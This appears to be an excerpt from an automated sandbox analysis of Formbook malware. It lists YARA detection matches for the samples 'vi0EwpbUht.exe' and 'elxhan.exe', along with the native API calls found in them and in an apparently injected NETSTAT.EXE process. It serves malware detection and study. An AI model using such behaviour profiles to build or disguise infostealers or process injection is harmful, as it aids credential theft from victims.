          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0041A050 NtClose,3_2_0041A050
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0041A100 NtAllocateVirtualMemory,3_2_0041A100
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419F20 NtCreateFile,3_2_00419F20
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419FD0 NtReadFile,3_2_00419FD0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0041A04A NtClose,3_2_0041A04A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419F74 NtCreateFile,3_2_00419F74
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419F1A NtCreateFile,3_2_00419F1A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419FCB NtReadFile,3_2_00419FCB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00A098F0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A09860
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09840 NtDelayExecution,LdrInitializeThunk,3_2_00A09840
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A099A0 NtCreateSection,LdrInitializeThunk,3_2_00A099A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00A09910
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A20 NtResumeThread,LdrInitializeThunk,3_2_00A09A20
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00A09A00
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A50 NtCreateFile,LdrInitializeThunk,3_2_00A09A50
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A095D0 NtClose,LdrInitializeThunk,3_2_00A095D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09540 NtReadFile,LdrInitializeThunk,3_2_00A09540
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A096E0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A09660
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00A097A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,3_2_00A09780
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,3_2_00A09710
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A098A0 NtWriteVirtualMemory,3_2_00A098A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09820 NtEnumerateKey,3_2_00A09820
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0B040 NtSuspendThread,3_2_00A0B040
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A099D0 NtCreateProcessEx,3_2_00A099D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09950 NtQueueApcThread,3_2_00A09950
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A80 NtOpenDirectoryObject,3_2_00A09A80
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A10 NtQuerySection,3_2_00A09A10
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0A3B0 NtGetContextThread,3_2_00A0A3B0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09B00 NtSetValueKey,3_2_00A09B00
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A095F0 NtQueryInformationFile,3_2_00A095F0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09520 NtWaitForSingleObject,3_2_00A09520
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0AD30 NtSetContextThread,3_2_00A0AD30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09560 NtWriteFile,3_2_00A09560
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A096D0 NtCreateKey,3_2_00A096D0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09610 NtEnumerateValueKey,3_2_00A09610
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09670 NtQueryInformationProcess,3_2_00A09670
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09650 NtQueryValueKey,3_2_00A09650
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09FE0 NtCreateMutant,3_2_00A09FE0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09730 NtQueryVirtualMemory,3_2_00A09730
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0A710 NtOpenProcessToken,3_2_00A0A710
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09760 NtOpenProcess,3_2_00A09760
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09770 NtSetInformationFile,3_2_00A09770
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0A770 NtOpenThread,3_2_00A0A770
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041A050 NtClose,3_1_0041A050
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041A100 NtAllocateVirtualMemory,3_1_0041A100
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419F20 NtCreateFile,3_1_00419F20
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419FD0 NtReadFile,3_1_00419FD0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041A04A NtClose,3_1_0041A04A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419F74 NtCreateFile,3_1_00419F74
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419F1A NtCreateFile,3_1_00419F1A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419FCB NtReadFile,3_1_00419FCB
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041A050 NtClose,7_2_0041A050
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041A100 NtAllocateVirtualMemory,7_2_0041A100
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419F20 NtCreateFile,7_2_00419F20
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419FD0 NtReadFile,7_2_00419FD0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041A04A NtClose,7_2_0041A04A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419F74 NtCreateFile,7_2_00419F74
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419F1A NtCreateFile,7_2_00419F1A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419FCB NtReadFile,7_2_00419FCB
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_00A598F0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,7_2_00A59860
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59840 NtDelayExecution,LdrInitializeThunk,7_2_00A59840
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A599A0 NtCreateSection,LdrInitializeThunk,7_2_00A599A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_00A59910
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A20 NtResumeThread,LdrInitializeThunk,7_2_00A59A20
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00A59A00
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A50 NtCreateFile,LdrInitializeThunk,7_2_00A59A50
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A595D0 NtClose,LdrInitializeThunk,7_2_00A595D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59540 NtReadFile,LdrInitializeThunk,7_2_00A59540
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00A596E0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_00A59660
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_00A597A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,7_2_00A59780
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,7_2_00A59710
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A598A0 NtWriteVirtualMemory,7_2_00A598A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59820 NtEnumerateKey,7_2_00A59820
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5B040 NtSuspendThread,7_2_00A5B040
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A599D0 NtCreateProcessEx,7_2_00A599D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59950 NtQueueApcThread,7_2_00A59950
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A80 NtOpenDirectoryObject,7_2_00A59A80
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A10 NtQuerySection,7_2_00A59A10
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5A3B0 NtGetContextThread,7_2_00A5A3B0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59B00 NtSetValueKey,7_2_00A59B00
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A595F0 NtQueryInformationFile,7_2_00A595F0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59520 NtWaitForSingleObject,7_2_00A59520
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5AD30 NtSetContextThread,7_2_00A5AD30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59560 NtWriteFile,7_2_00A59560
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A596D0 NtCreateKey,7_2_00A596D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59610 NtEnumerateValueKey,7_2_00A59610
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59670 NtQueryInformationProcess,7_2_00A59670
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59650 NtQueryValueKey,7_2_00A59650
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59FE0 NtCreateMutant,7_2_00A59FE0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59730 NtQueryVirtualMemory,7_2_00A59730
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5A710 NtOpenProcessToken,7_2_00A5A710
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59760 NtOpenProcess,7_2_00A59760
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59770 NtSetInformationFile,7_2_00A59770
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5A770 NtOpenThread,7_2_00A5A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A50 NtCreateFile,LdrInitializeThunk,17_2_02DC9A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9840 NtDelayExecution,LdrInitializeThunk,17_2_02DC9840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9860 NtQuerySystemInformation,LdrInitializeThunk,17_2_02DC9860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC99A0 NtCreateSection,LdrInitializeThunk,17_2_02DC99A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_02DC9910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC96D0 NtCreateKey,LdrInitializeThunk,17_2_02DC96D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_02DC96E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9650 NtQueryValueKey,LdrInitializeThunk,17_2_02DC9650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_02DC9660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9FE0 NtCreateMutant,LdrInitializeThunk,17_2_02DC9FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9780 NtMapViewOfSection,LdrInitializeThunk,17_2_02DC9780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9710 NtQueryInformationToken,LdrInitializeThunk,17_2_02DC9710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC95D0 NtClose,LdrInitializeThunk,17_2_02DC95D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9540 NtReadFile,LdrInitializeThunk,17_2_02DC9540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A80 NtOpenDirectoryObject,17_2_02DC9A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A10 NtQuerySection,17_2_02DC9A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A00 NtProtectVirtualMemory,17_2_02DC9A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A20 NtResumeThread,17_2_02DC9A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCA3B0 NtGetContextThread,17_2_02DCA3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9B00 NtSetValueKey,17_2_02DC9B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC98F0 NtReadVirtualMemory,17_2_02DC98F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC98A0 NtWriteVirtualMemory,17_2_02DC98A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCB040 NtSuspendThread,17_2_02DCB040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9820 NtEnumerateKey,17_2_02DC9820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC99D0 NtCreateProcessEx,17_2_02DC99D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9950 NtQueueApcThread,17_2_02DC9950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9670 NtQueryInformationProcess,17_2_02DC9670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9610 NtEnumerateValueKey,17_2_02DC9610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC97A0 NtUnmapViewOfSection,17_2_02DC97A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCA770 NtOpenThread,17_2_02DCA770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9770 NtSetInformationFile,17_2_02DC9770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9760 NtOpenProcess,17_2_02DC9760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCA710 NtOpenProcessToken,17_2_02DCA710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9730 NtQueryVirtualMemory,17_2_02DC9730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC95F0 NtQueryInformationFile,17_2_02DC95F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9560 NtWriteFile,17_2_02DC9560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCAD30 NtSetContextThread,17_2_02DCAD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9520 NtWaitForSingleObject,17_2_02DC9520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236A050 NtClose,17_2_0236A050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236A100 NtAllocateVirtualMemory,17_2_0236A100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369F20 NtCreateFile,17_2_02369F20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369FD0 NtReadFile,17_2_02369FD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236A04A NtClose,17_2_0236A04A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369F1A NtCreateFile,17_2_02369F1A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369F74 NtCreateFile,17_2_02369F74
